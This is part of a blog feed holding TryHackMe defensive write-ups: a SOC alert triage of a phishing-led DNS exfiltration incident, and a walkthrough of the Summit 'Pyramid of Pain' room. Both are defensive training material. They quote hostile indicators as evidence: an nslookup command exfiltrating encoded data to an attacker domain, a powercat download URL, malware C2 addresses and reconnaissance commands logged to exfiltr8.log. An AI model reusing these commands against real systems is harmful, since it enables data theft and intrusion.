<p>At 01/26/2026 21:16:44.240 spam was received by yani.zubair@tryhatme[.]com, which belongs to Yani Zubair, from IT, using hostname win-3449. The email was from leonard@fashionindustrytrends[.]xyz. This email used common Phishing strategies (MITRE ATT&amp;CK ID T1566) such as offering compensation by entering a page and clicking something.
Further actions from Yani Zubair&#39;s hostname after the email was received were analyzed, but the Splunk logs showed no evident malicious events. It seems the user has ignored the email message. Due to this, it is a True Positive, but no escalation is required.</p>

<h2 id="alert-3-suspicious-parent-child-relationship-id-1025-high-severity">Alert 3: Suspicious Parent Child Relationship (ID 1025) – High severity</h2>

<blockquote>Description:
<br>
A suspicious process with an uncommon parent-child relationship was detected in your environment.
<br>
<br>
timestamp:
<br>
01/26/2026 21:45:42.473
<br>
<br>
host.name:
<br>
win-3450
<br>
<br>
process.name:
<br>
nslookup.exe
<br>
<br>
process.pid:
<br>
5520
<br>
<br>
process.parent.pid
<br>
3728
<br>
<br>
process.parent.name:
<br>
powershell.exe
<br>
<br>
process.command_line:
<br>
&#34;C:\Windows\system32\nslookup.exe&#34; UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io
<br>
<br>
process.working_directory:
<br>
C:\Users\michael.ascot\downloads\exfiltration\
<br>
<br>
event.action:
<br>
Process Create (rule: ProcessCreate)
</blockquote>

<p>This alert had a <b style="color:red">HIGH SEVERITY</b>, and there is no wonder why... what exactly happened?
Let&#39;s take a look at the information the SIEM is giving us. It seems that hostname win-3450 is using the powershell from a directory called “exfiltration” to perform a nslookup of a domain with a subdomain of what looks like encoded data. This is obviously data being exfiltrated.
Let&#39;s see what we can find from the logs. But first, let&#39;s check who win-3450 is.
From the Company Information tab, we find out that the win-3450 device is being used by Michael Ascot, whose email address is michael.ascot@tryhatme[.]com, and is the CEO of the company.
Anyway, this alert seemed to come out of nowhere. We got a timestamp and we got the device that is creating these processes. Let&#39;s check events happening at this hostname a few minutes before an after the alert.</p>

<p>Splunk shows us a long list of problematic events right after this one. There are multiple registry modifications and other processes creations, including downloading external resources from the powershell (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1), even more lookups to different (encoded) subdomains of haz4rdw4re.io, and performing command such as systeminfo or whoami.
This is absolutely not common or expected behavior from any host. Data is clearly being exfiltrated by using DNS queries, and it is done this way because DNS is a very common protocol to see flowing through networks and, therefore, less monitored. It helps to avoid detection or filtering. The encoded subdomains are actually the data that is being exfiltrated, but encoded.
Commands such as systeminfo or whoami are commonly used during Post-Exploitation, as these give the attacker information on the current user&#39;s privileges and machine (MITRE ATT&amp;CK ID T1033).
Now we have confirmed that this is a True Positive, but we still don&#39;t know how it happened. Looking at earlier timestamps, we find that right before all this sequence of events happened, a file named “<strong>ImportantInvoice-Febrary.zip</strong>” was created at the /downloads directory, which later created the /exfiltration subdirectory. We have no information regarding where this file came from. Let&#39;s search for it on Splunk.</p>

<p>Eventually, using Splunk search filters, we will find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO&#39;s email, michael.ascot@tryhatme.com, received a email containing an attachment named <strong>ImportantInvoice-Febrary.zip</strong>. The body and subject of the email indicated that an account was about the closed unless payment was processed, and to read the attachment to stop it. Yet another common Phishing technique, or Spearphishing in this case as the target was the CEO. The Spearphishing through Attachment technique has a MITRE ATT&amp;CK ID of T1566.001. We can also notice a small typo on the name of the attachment (Fe<strong>bra</strong>ry instead of Fe<strong>brua</strong>ry), which is not uncommon to see on Phishing emails.
This CEO would unfortunately download the file at 01/26/2026 21:40:26.47. as Splunk shows us the file was created in the C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip file path. The chain of malicious events follows.</p>

<p>With all this information, we can write quite a hefty report. We now know it&#39;s a True Positive and that it requires escalation.</p>

<p><strong>Recommended Remediation Actions:</strong> host isolation to prevent further movement, malware cleanup, phishing awaraness training, Data Loss Prevention tools. Add haz4rd4wre.io to list of malicious domains. The file was also run on the TryDetectMe threat intelligence tool, which recognized it as clean – inform on this as well.</p>

<p><strong>Alerts with IDs 1005, 1020, 1023, 1026-1034 were related to this alert</strong> – they were either the spearphishing email, the creation of the malicious attachment, or other alerts of the Suspicious Parent-Child relationship type but with lookups to other subdomains. Because of this, they should have the same verdict, but be sure to explain this thoroughly on the report (the LLM will most likely still grade it with low points, but that&#39;s due to its logic rather than a mistake on our side).</p>

<h2 id="alert-4-network-drive-mapped-to-a-local-drive-id-1022-medium-severity">Alert 4: Network drive mapped to a local drive (ID 1022) – Medium severity</h2>

<blockquote>Description:
<br>
A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.
<br>
<br>
timestamp:
<br>
01/26/2026 21:43:57.473
<br>
<br>
host.name:
<br>
win-3450
<br>
<br>
process.name:
<br>
net.exe
<br>
<br>
process.pid:
<br>
5784
<br>
<br>
process.parent.pid
<br>
3728
<br>
<br>
process.parent.name:
<br>
powershell.exe
<br>
<br>
process.command_line:
<br>
&#34;C:\Windows\system32\net.exe&#34; use Z: \\FILESRV-01\SSF-FinancialRecords
<br>
<br>
process.working_directory:
<br>
C:\Users\michael.ascot\downloads\
<br>
<br>
event.action:
<br>
Process Create (rule: ProcessCreate)
</blockquote>

<p>This normally wouldn&#39;t be cause for concern, as the description in the SIEM tells us, but we can see it happened on <strong>hostname win-3450</strong>, who was just the victim of a Phishing attack. The timestamp here will be key to detect any potential problem.</p>

<p>At 01/26/2026 21:43:57.47, Michael Ascot copied the SSF-FinancialRecords file to a local drive, which was disconnected at 01/26/2026 21:44:42.473. There is nothing extraordinary about this.
However, if we take a look at the Splunk logs near this event, at 01/26/2026 21:44:31.473 it is revealed that a process, with the same process ID of a process that is part of the malware involved in Alert ID 1025 (True Positive requiring escalation), cloned the file to the C:\Users\michael.ascot\downloads\exfiltration /E directory – the directory used to exfiltrate files. The malware running was most likely set up to clone any file in transit to different directories to the exfiltration directory.</p>

<p><strong>Recommended Remediation Actions:</strong> similarly to Alert ID 1025, user awareness training, and DLP and IPS tools should be put in place.</p>

<p><strong>Alert ID 1024</strong> – Network drive disconnected from a local drive, is part of this alert (the disconnection of this drive), and therefore has the same verdict.</p>

<p>And with this one, the room has finished. Out of 36 alerts, there were <b style="color:darkgreen">17 True Positives</b>, where most of them were alerts generated as a result of processes from previous alerts. We learnt the importance of <strong>User Awareness Training</strong>, as this could have been avoided if the user from Alert 1025 would have not have downloaded the attachment, and of <strong>Log monitoring</strong>. How a single email ended up cluttering the SIEM with alerts and created a serious incident. It is important to always remain vigilant and constantly monitor the network, as an attack can strike in many forms and at any time, and have catastrophic consequences.</p>
]]></content:encoded>
      <author>plutogazer writeups</author>
      <guid>https://infosec.press/read/a/ye6vzx5kd4</guid>
      <pubDate>Mon, 02 Feb 2026 17:49:31 +0000</pubDate>
    </item>
    <item>
      <title>Summit - TryHackMe Defensive Security Challenge</title>
      <link>https://infosec.press/plutogazer/summit-tryhackme-defensive-security-challenge</link>
      <description>&lt;![CDATA[This is a Walkthrough for the Summit Incident Response TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.&#xA;br&#xA;Introduction&#xA;The description of the room is the following:&#xA;blockquote&#xA;Can you chase a simulated adversary up the Pyramid of Pain until they finally back down?&#xA;/blockquote&#xA;&#xA;The room is essentially a threat detection and response simulator focusing on defending against increasingly harder threats by following the levels on the Pyramid of Pain. We will be receiving .exe files by email, and will have to run those through a built-in sandbox analysis tool.&#xA;&#xA;The first email we get is one containing a file named sample1.exe&#xA;&#xA;Task 1: What is the first flag you receive after successfully detecting sample1.exe?&#xA;&#xA;Read the email and click on the attachment to download.&#xA;Go to the burger menu on the top left, then click on the Malware Sandbox tool. Choose sample1.exe&#xA;&#xA;After a while, we will get the results. We got an information table and a Behaviour Analysis section. For this task, though, we have to focus on the table:&#xA;&#xA;| File Name     | sample1.exe                                                      |&#xA;| ----------------- | ------------------------------------------------------------------ |&#xA;| File Size     | 202.50 KB                                                          |&#xA;| File Type     | PE32+ executable (GUI) x86-64, for MS Windows                      |&#xA;| Analysis Date | September 5, 2023                                                  |&#xA;| OS            | Windows 10x64 v1803                                                |&#xA;| Tags          | Trojan.Metasploit.A                                                |&#xA;| MIME          | application/x-dosexec                                              |&#xA;| MD5           | cbda8ae000aa9cbe7c8b982bae006c2a                                 |&#xA;| SHA1          | 83d2791ca93e58688598485aa62597c0ebbf7610                         |&#xA;| SHA256        | 9c550591a25c6228cb7d74d970d133d75c961ffed2ef7180144859cc09efca8c |&#xA;Following the Pyramid of Pain, the first level is &#34;Hash value.&#34;&#xA;&#xA;Go to the burger menu, then click on Manage Hashes.&#xA;There are three options: MD5, SHA1, SHA256. Pick either, and input the corresponding hash.&#xA;&#xA;We will get a message congratulating us on completing the task, and a new email containing flag 1 and the next malware sample.&#xA;&#xA;Task 2: What is the second flag you receive after successfully detecting sample2.exe?&#xA;&#xA;Read the new email and click on the sample2.exe attachment.&#xA;Analyze the file on the Malware Sandbox tool.&#xA;&#xA;But by changing just one bit the hash value of a file can change completely, so it is easy to evade this method. The second level of the Pyramid of Pain corresponds to IP Addresses. The analysis will give us, again, an information table, a Behaviour Analysis section, and now a Network Activity. The latter is the one we will have to check now.&#xA;&#xA;The results are as follows (Information Table and Behaviour Analysis sections omitted):&#xA;&#xA;Network Activity&#xA;&#xA;HTTP(S) requests&#xA;&#xA;1&#xA;&#xA;TCP/UDP connections&#xA;&#xA;3&#xA;&#xA;DNS requests&#xA;&#xA;0&#xA;&#xA;Threats&#xA;&#xA;0&#xA;&#xA;HTTP requests&#xA;&#xA;| PID  | Process     | Method | IP                 | URL                                 |&#xA;| ---- | ----------- | ------ | ------------------ | ----------------------------------- |&#xA;| 1927 | sample2.exe | GET    | 154.35.10.113:4444 | http://154.35.10.113:4444/uvLk8YI32 |&#xA;&#xA;Connections&#xA;&#xA;| PID  | Process     | IP                 | Domain | ASN                       |&#xA;| ---- | ----------- | ------------------ | ------ | ------------------------- |&#xA;| 1927 | sample2.exe | 154.35.10.113:4444 | -      | Intrabuzz Hosting Limited |&#xA;| 1927 | sample2.exe | 40.97.128.3:443    | -      | Microsoft Corporation     |&#xA;| 1927 | sample2.exe | 40.97.128.4:443    | -      | Microsoft Corporation     |&#xA;&#xA;If we take a look at the HTTP Request we can see the executable connects to and downloads a file from the 154.35.10.113 IP address.&#xA;We now have to create a Firewall rule for this IP address.&#xA;&#xA;Go to the Burger Menu, then click on the Firewall Manager tool. We need to fill some fields, which we will as follows:&#xA;Type: Egress&#xA;Source IP: Any&#xA;Destination IP: 154.35.10.113&#xA;Action: Deny&#xA;&#xA;We will receive a congratulating message and a new email with flag 2.&#xA;&#xA;Extra: Why not the other two IPs&#xA;According to the analysis, the file would make a connection to another two addresses: 40.97.128.3 and 40.97.128.4. These IP addresses, however, were identified to belong to Microsoft whereas the one we chose apparently belongs to a hosting service. Connecting to a Microsoft IP address is completely normal for business operations... not so much connecting to and downloading files from an IP address that belongs to a hosting service.&#xA;&#xA;Task 3: What is the third flag you receive after successfully detecting sample3.exe?&#xA;&#xA;Changing one&#39;s IP address is not particularly hard - the attacker mentions on their email message that they hired a new Cloud Service Provider and now have access to many more IPs. The third level of the Pyramid of Pain corresponds to Domain Names. &#xA;&#xA;Read the new email and analyze the sample3.exe file.&#xA;&#xA;Under Network Activity we will have a new section, DNS requests.&#xA;&#xA;(output omitted)&#xA;&#xA;Network Activity&#xA;&#xA;HTTP(S) requests&#xA;&#xA;2&#xA;&#xA;TCP/UDP connections&#xA;&#xA;4&#xA;&#xA;DNS requests&#xA;&#xA;2&#xA;&#xA;Threats&#xA;&#xA;0&#xA;&#xA;HTTP requests&#xA;&#xA;| PID  | Process     | Method | IP                | URL                                        |&#xA;| ---- | ----------- | ------ | ----------------- | ------------------------------------------ |&#xA;| 1021 | sample3.exe | GET    | 62.123.140.9:1337 | http://emudyn.bresonicz.info:1337/kzn293la |&#xA;| 1021 | sample3.exe | GET    | 62.123.140.9:80   | http://emudyn.bresonicz.info/backdoor.exe  |&#xA;&#xA;Connections&#xA;&#xA;| PID  | Process      | IP                | Domain                 | ASN                     |&#xA;| ---- | ------------ | ----------------- | ---------------------- | ----------------------- |&#xA;| 1021 | sample3.exe  | 40.97.128.4:443   | services.microsoft.com | Microsoft Corporation   |&#xA;| 1021 | sample3.exe  | 62.123.140.9:1337 | emudyn.bresonicz.info  | XplorIta Cloud Services |&#xA;| 1021 | sample3.exe  | 62.123.140.9:80   | emudyn.bresonicz.info  | XplorIta Cloud Services |&#xA;| 2712 | backdoor.exe | 62.123.140.9:80   | emudyn.bresonicz.info  | XplorIta Cloud Services |&#xA;&#xA;DNS requests&#xA;&#xA;|Domain|IP|&#xA;|---|---|&#xA;|services.microsoft.com|40.97.128.4|&#xA;|emudyn.bresonicz.info|62.123.140.9|&#xA;&#xA;The DNS requests section showed us the domain the executable is downloading files from, emudyn.bresonicz.info. The other one belongs to Microsoft, so we can assume it&#39;s safe.&#xA;&#xA;Head to the Burger menu, and then click on DNS Rule Manager.&#xA;Click on Create DNS Rule&#xA;We have to fill some fields. Do so as follows:&#xA;&#x9;Rule name: (Any works. I named it &#34;Deny Phishing Domain.&#34;)&#xA;&#x9;Category: Phishing&#xA;&#x9;Domain Name: emudyn.bresonicz.info&#xA;&#x9;Action: Deny&#xA;&#xA;We will receive a congratulating message and a new email with flag 3.&#xA;&#xA;Task 4: What is the fourth flag you receive after successfully detecting sample4.exe?&#xA;&#xA;Changing one&#39;s domain is harder than changing an IP address, as this requires purchasing a new domain and modifying DNS records. Still, a very determined hacker might still be willing to do so (and also, some DNS providers have loose standards). The next level of the Pyramid of Pain corresponds to Host and Network Artifacts.&#xA;&#xA;Read the email and analyze sample4.exe.&#xA;&#xA;The new email will contain a Registry Activity section after all the previous one. Let&#39;s take a look at that one.&#xA;&#xA;(output omitted)&#xA;Registry Activity&#xA;&#xA;Total events&#xA;&#xA;3&#xA;&#xA;Read events&#xA;&#xA;1&#xA;&#xA;Write events&#xA;&#xA;2&#xA;&#xA;Delete events&#xA;&#xA;0&#xA;&#xA;Modification events&#xA;&#xA;| (PID) Process: (3806) sample4.exe  | Key: HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection        |&#xA;| -------------------------------------- | ------------------------------------------------------------------------------------------- |&#xA;| Operation: write                   | Name: DisableRealtimeMonitoring                                                         |&#xA;| Value: 1                           |                                                                                             |&#xA;| (PID) Process: (1928) explorer.exe | Key: HKEYCURRENTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced      |&#xA;| Operation: write                   | Name: EnableBalloonTips                                                                 |&#xA;| Value: 1                           |                                                                                             |&#xA;| (PID) Process: (9876) notepad.exe  | Key: HKEYCURRENTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt |&#xA;| Operation: read                    | Name: Progid                                                                            |&#xA;| Value: txtfile                     |                                                                                             |&#xA;&#xA;If we look at the first event, sample4.exe appears to be disabling Windows Defender Real-Time Protection by modifying the Windows Registry. This is the artifact, finding this is how we know we have a potentially infected host. We now have to create a rule that alerts us when this happens.&#xA;&#xA;Go to the Burger Menu, then click on Sigma Rule Builder.&#xA;Click on Create Sigma Rule. A Sigma rule will be generated by an LLM based on the options we pick.&#xA;On the &#34;I want to create a rule that focuses on:&#34; section, pick Sysmon Event Logs.&#xA;On &#34;I want to target this Sysmon event:&#34;, pick Registry Modifications.&#xA;You have to fill some fields to generate the rule. Fill them as follows:&#xA;&#x9;Registry Key: HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection&#xA;&#x9;Registry Name: DisableRealtimeMonitoring&#xA;&#x9;Value: 1&#xA;&#x9;ATT&amp;CK ID: Defense Evasion (TA0005)&#xA;Click on the Validate Rule button.&#xA;&#xA;Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 4.&#xA;&#xA;Extra: why &#34;alert&#34; and not &#34;respond&#34;.&#xA;The reason we are creating a rule to alert rather than to respond like we did in the previous steps is because disabling Real Time Protection is, while unusual (and warned against on modern Windows), a potentially benign action. We alert the cybersecurity team when it occurs so they can investigate the situation and determine if it is expected or not, instead of just not allowing and potentially hindering a normal business operation.&#xA;&#xA;Task 5: What is the fifth flag you receive after successfully detecting sample5.exe?&#xA;&#xA;Knowing the artifacts an attacker leaves on a system means the attacker will have to change their tools and methodologies, which means they will have to spend even more resources to attack our system. We are now on the highest levels of the pyramid, the ones with the highest difficulty for the attacker to bypass, and at this point it&#39;s very likely they changed their target. Still, if the attacker persists, the second-to-last level of the Pyramid of Pain corresponds to detecting Tools.&#xA;&#xA;Read the new email and click on sample5.exe&#xA;According to the email, the &#34;heavy lifting&#34; and instructions now occur on their backend server, which means we will have significantly less information on the file&#39;s actions.&#xA;&#xA;This time we don&#39;t have the results of an analysis, but a log of attempted connections:&#xA;&#xA;&#34;&#xA;2023-08-15 09:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 09:23:45 | Source: 10.10.15.12 | Destination: 43.10.65.115 | Port: 443 | Size: 21541 bytes&#xA;2023-08-15 09:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 10:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 10:14:21 | Source: 10.10.15.12 | Destination: 87.32.56.124 | Port: 80  | Size: 1204 bytes&#xA;2023-08-15 10:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 11:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 11:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 11:45:09 | Source: 10.10.15.12 | Destination: 145.78.90.33 | Port: 443 | Size: 805 bytes&#xA;2023-08-15 12:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 12:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 13:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 13:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 13:32:17 | Source: 10.10.15.12 | Destination: 72.15.61.98  | Port: 443 | Size: 26084 bytes&#xA;2023-08-15 14:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 14:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 14:55:33 | Source: 10.10.15.12 | Destination: 208.45.72.16 | Port: 443 | Size: 45091 bytes&#xA;2023-08-15 15:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 15:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 15:40:10 | Source: 10.10.15.12 | Destination: 101.55.20.79 | Port: 443 | Size: 95021 bytes&#xA;2023-08-15 16:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 16:18:55 | Source: 10.10.15.12 | Destination: 194.92.18.10 | Port: 80  | Size: 8004 bytes&#xA;2023-08-15 16:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 17:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 17:09:30 | Source: 10.10.15.12 | Destination: 77.23.66.214 | Port: 443 | Size: 9584 bytes&#xA;2023-08-15 17:27:42 | Source: 10.10.15.12 | Destination: 156.29.88.77 | Port: 443 | Size: 10293 bytes&#xA;2023-08-15 17:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 18:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 18:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 19:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 19:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 20:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 20:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;2023-08-15 21:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes&#xA;&#xA;I confess the first thing I noticed was that the length for a lot of the attempts: most of them were over 10 KB in length. Then I realized what the actual problem with this log was: most of them go to the same destination, with the exact same byte length.&#xA;&#xA;The attacker is probably using a tool that fragments messages in 97 bytes. Let us create a Sigma rule to detect when this happens.&#xA;&#xA;Go to Create Sigma Rule, then click on Sysmon Event Logs.&#xA;On &#34;I want to target this Sysmon event:&#34;, pick Network Connections.&#xA;Fill the requested fields as follows:&#xA;&#x9;Remote IP: Any&#xA;&#x9;Remote Port: Any&#xA;&#x9;Size (bytes): 97&#xA;&#x9;Frequency (seconds): 1800 &#xA;&#x9;ATT&amp;CK ID: Command and Control (TA0011)&#xA;&#xA;Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 5.&#xA;Extra: why this rule&#xA;Like in the previous task, we need to alert rather than to block, as legitimate network traffic may match this criteria. We chose the Remote IP and Remote Port to be &#34;Any&#34; because we now the attacker can change their IP address, but this also causes that this rule could be triggered at any point. However, SOC analysts would notice how many messages with the same length would go to the same IP address, and the fact that it happens every 30 minutes without fail, and respond to it. This is a common Defense Evasion technique, as fragmented messages are stealthier than sending all the data meant to be exfiltrated at once, and would also stop Data Loss Prevention systems from being executed.&#xA;&#xA;Task 6: What is the final flag you receive from Sphinx?&#xA;&#xA;A top attacker might have enough money and time to invest in changing and/or building and learning new tools and methodologies. We are at the last level of the Pyramid of Pain, and this corresponds to the Tactics, Techniques, and Procedures of the attacker. If we can detect and respond to how an attacker operates, they have almost no chance to fight back.&#xA;&#xA;Read the final email and open the attachment.&#xA;&#xA;This time the attachment is a log of the commands the sample files run once opened:&#xA;blockquote&#xA;dir c:\     %temp%\exfiltr8.log&#xA;br&#xA;dir &#34;c:\Documents and Settings&#34;     %temp%\exfiltr8.log&#xA;br&#xA;dir &#34;c:\Program Files\&#34;     %temp%\exfiltr8.log&#xA;br&#xA;dir d:\     %temp%\exfiltr8.log&#xA;br&#xA;net localgroup administrator     %temp%\exfiltr8.log&#xA;br&#xA;ver     %temp%\exfiltr8.log&#xA;br&#xA;systeminfo     %temp%\exfiltr8.log&#xA;br&#xA;ipconfig /all     %temp%\exfiltr8.log&#xA;br&#xA;netstat -ano     %temp%\exfiltr8.log&#xA;br&#xA;net start     %temp%\exfiltr8.log&#xA;/blockquote&#xA;This is showing us the sample files were using commands that display important system information (directory trees, user list, system info, network information) and redirect the output to a file named exfiltr8.log, located in the temp folder (common place to hide malware, as nearly everything has writing permissions here.)&#xA;Let us generate a rule to detect the creation of this file.&#xA;&#xA;Go to Create Sigma Rule, and then click on System Event Logs.&#xA;On &#34;I want to target this Sysmon event:&#34;, pick File Creation and Modification.&#xA;Fill the requested fields as follows:&#xA;&#x9;File Path: %temp%&#xA;&#x9;File Name: exfiltr8.log&#xA;&#x9;ATT&amp;CK ID: Collection (TA0009)&#xA;&#xA;Once it generates the Sigma rule, we will receive a congratulating message and a new email with the final flag.&#xA;&#xA;b style=&#34;color:darkgreen&#34;Congratulations!/b The room is finished. &#xA;&#xA;What I Learnt&#xA;Pyramid of Pain: this challenge allowed me to strengthen my knowledge on the framework, forcing me to think why each level has its corresponding difficulty, by thinking how an attacker could bypass a detection or deny rule.&#xA;Sigma rule structure: levels 3 to 5 involved generating a Sigma rule, which the SOC L1 learning path (this challenge was part of it) has no room on at this point.&#xA;Analyzing logs: task 5 was about to look for a specific pattern in a log file. Even if at first I focused on the wrong pattern, I managed to realize quite quickly what was I supposed to be looking for.&#xA;Learning how an attacker might hide their actions, and thinking of False Positives: some tasks involved the attacker hiding their signatures, or hiding their actions by modifying system files. For these I had to consider about False Positives as well, as some of their actions could be similar to normally benign actions, and creating an overly lax detection rule might make the SOC team focus on the wrong alert.]]&gt;</description>
      <content:encoded><![CDATA[<p>This is a Walkthrough for the <a href="https://tryhackme.com/room/summit" rel="nofollow">Summit</a> Incident Response <a href="https://tryhackme.com" rel="nofollow">TryHackMe</a> challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.
<br></p>

<h2 id="introduction">Introduction</h2>

<p>The description of the room is the following:
<blockquote>Can you chase a simulated adversary up the Pyramid of Pain until they finally back down?
</blockquote></p>

<p>The room is essentially a threat detection and response simulator focusing on defending against increasingly harder threats <strong>by following the levels on the Pyramid of Pain</strong>. We will be receiving .exe files by email, and will have to run those through a built-in sandbox analysis tool.</p>

<p>The first email we get is one containing a file named <strong><code>sample1.exe</code></strong></p>

<h2 id="task-1-what-is-the-first-flag-you-receive-after-successfully-detecting-sample1-exe">Task 1: What is the first flag you receive after successfully detecting <strong>sample1.exe</strong>?</h2>
<ol><li>Read the email and click on the attachment to download.</li>
<li>Go to the burger menu on the top left, then click on the Malware Sandbox tool. Choose <strong>sample1.exe</strong></li></ol>

<p>After a while, we will get the results. We got an information table and a Behaviour Analysis section. For this task, though, we have to focus on the table:</p>

<table>
<thead>
<tr>
<th><strong>File Name</strong></th>
<th><code>sample1.exe</code></th>
</tr>
</thead>

<tbody>
<tr>
<td><strong>File Size</strong></td>
<td>202.50 KB</td>
</tr>

<tr>
<td><strong>File Type</strong></td>
<td>PE32+ executable (GUI) x86-64, for MS Windows</td>
</tr>

<tr>
<td><strong>Analysis Date</strong></td>
<td>September 5, 2023</td>
</tr>

<tr>
<td><strong>OS</strong></td>
<td>Windows 10x64 v1803</td>
</tr>

<tr>
<td><strong>Tags</strong></td>
<td>Trojan.Metasploit.A</td>
</tr>

<tr>
<td><strong>MIME</strong></td>
<td>application/x-dosexec</td>
</tr>

<tr>
<td><strong>MD5</strong></td>
<td><code>cbda8ae000aa9cbe7c8b982bae006c2a</code></td>
</tr>

<tr>
<td><strong>SHA1</strong></td>
<td><code>83d2791ca93e58688598485aa62597c0ebbf7610</code></td>
</tr>

<tr>
<td><strong>SHA256</strong></td>
<td><code>9c550591a25c6228cb7d74d970d133d75c961ffed2ef7180144859cc09efca8c</code></td>
</tr>
</tbody>
</table>

<p><strong>Following the Pyramid of Pain, the first level is “Hash value.”</strong></p>
<ol><li>Go to the burger menu, then click on Manage Hashes.</li>
<li>There are three options: MD5, SHA1, SHA256. Pick either, and input the corresponding hash.</li></ol>

<p>We will get a message congratulating us on completing the task, and a new email containing <strong>flag 1</strong> and the next malware sample.</p>

<h2 id="task-2-what-is-the-second-flag-you-receive-after-successfully-detecting-sample2-exe">Task 2: What is the second flag you receive after successfully detecting <strong>sample2.exe</strong>?</h2>
<ol><li>Read the new email and click on the <strong>sample2.exe</strong> attachment.</li>
<li>Analyze the file on the Malware Sandbox tool.</li></ol>

<p>But by changing just one bit the hash value of a file can change completely, so it is easy to evade this method. The <strong>second level of the Pyramid of Pain</strong> corresponds to <strong>IP Addresses</strong>. The analysis will give us, again, an information table, a Behaviour Analysis section, and now a <strong>Network Activity</strong>. The latter is the one we will have to check now.</p>

<p>The results are as follows (Information Table and Behaviour Analysis sections omitted):</p>

<h3 id="network-activity">Network Activity</h3>

<h4 id="http-s-requests">HTTP(S) requests</h4>

<h4 id="1">1</h4>

<h4 id="tcp-udp-connections">TCP/UDP connections</h4>

<h4 id="3">3</h4>

<h4 id="dns-requests">DNS requests</h4>

<h4 id="0">0</h4>

<h4 id="threats">Threats</h4>

<h4 id="0-1">0</h4>

<h3 id="http-requests">HTTP requests</h3>

<table>
<thead>
<tr>
<th>PID</th>
<th>Process</th>
<th>Method</th>
<th>IP</th>
<th>URL</th>
</tr>
</thead>

<tbody>
<tr>
<td>1927</td>
<td>sample2.exe</td>
<td>GET</td>
<td>154.35.10.113:4444</td>
<td><a href="http://154.35.10.113:4444/uvLk8YI32" rel="nofollow">http://154.35.10.113:4444/uvLk8YI32</a></td>
</tr>
</tbody>
</table>

<h3 id="connections">Connections</h3>

<table>
<thead>
<tr>
<th>PID</th>
<th>Process</th>
<th>IP</th>
<th>Domain</th>
<th>ASN</th>
</tr>
</thead>

<tbody>
<tr>
<td>1927</td>
<td>sample2.exe</td>
<td>154.35.10.113:4444</td>
<td>-</td>
<td>Intrabuzz Hosting Limited</td>
</tr>

<tr>
<td>1927</td>
<td>sample2.exe</td>
<td>40.97.128.3:443</td>
<td>-</td>
<td>Microsoft Corporation</td>
</tr>

<tr>
<td>1927</td>
<td>sample2.exe</td>
<td>40.97.128.4:443</td>
<td>-</td>
<td>Microsoft Corporation</td>
</tr>
</tbody>
</table>

<p>If we take a look at the <strong>HTTP Request</strong> we can see the executable connects to and downloads a file from the <strong>154.35.10.113</strong> IP address.
We now have to create a Firewall rule for this IP address.</p>
